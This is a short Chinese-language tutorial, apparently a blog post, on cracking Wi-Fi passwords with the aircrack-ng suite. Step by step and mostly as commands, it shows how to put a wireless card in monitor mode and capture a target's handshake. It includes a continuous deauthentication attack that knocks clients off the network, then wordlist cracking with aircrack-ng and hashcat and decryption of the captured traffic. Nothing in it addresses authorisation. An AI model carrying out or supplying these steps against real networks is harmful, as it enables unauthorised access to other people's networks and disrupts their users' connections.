aircrack-ng抓握手包


安装

安装的话可以直接安装

yum install aircack-ng

apt install aircack-ng


默认打开是管理模式,其中有monitor(监视)模式,将网卡转换为扫描周围wifi。

扫描

1
2
3
4
5
6
7
8
9
10
ifconfig
#查看一下网卡
#如果没有那么就加载一下网卡,有你自己的就忽略掉
ifconfig wlan0 up

airmon-ng start wlan0
#wlan0将成为wlan0mon,成为监视模式

airodump-ng wlan0mon
#开始监视

握手包

1
2
3
4
airodump-ng -c 11 --bssid 1A:2W:E3:E3:R4 -w /home/WP wlan0mon
#然后攻击断线下,有抓到会显示hand-work
#-c 11,11是信道参数,--bssid是bssid值,-w 这里是保存的路径,最后是网卡名
#攻击掉线重连抓到握手包,文件.cap会储存在/home下,最后就是解包了

攻击掉线

1
2
3
aireplay-ng -0 0 -a 1A:2W:E3:E3:R4 -s 3E:R4:R4:D3:2W wlan0mon
#-0 0代表就是攻击参数,0是一直发,1是攻击一次。-a 是wifi的mac地址。-s 是客户端的mac地址。最后是网卡名
#如果是0,持续攻击的话,有掉线后就可以取消攻击了

解包

1
aircrack-ng ***.cap -w ./passwd.txt

数据包处理

1
2
#解密包
airdecap-ng -e AP名 -p 密码 ****.cap

hashcat破解握手包密码

1
2
3
4
#用aircrack-ng把cap转换成hccap类型数据包
aircrack-ng <input.cap> -J <out.hccap>
#用hashcat破解WPA/PSK密码( -m 2500为破解的模式为WPA/PSK方式)
hashcat -m 2500 testap.hccap pass.txt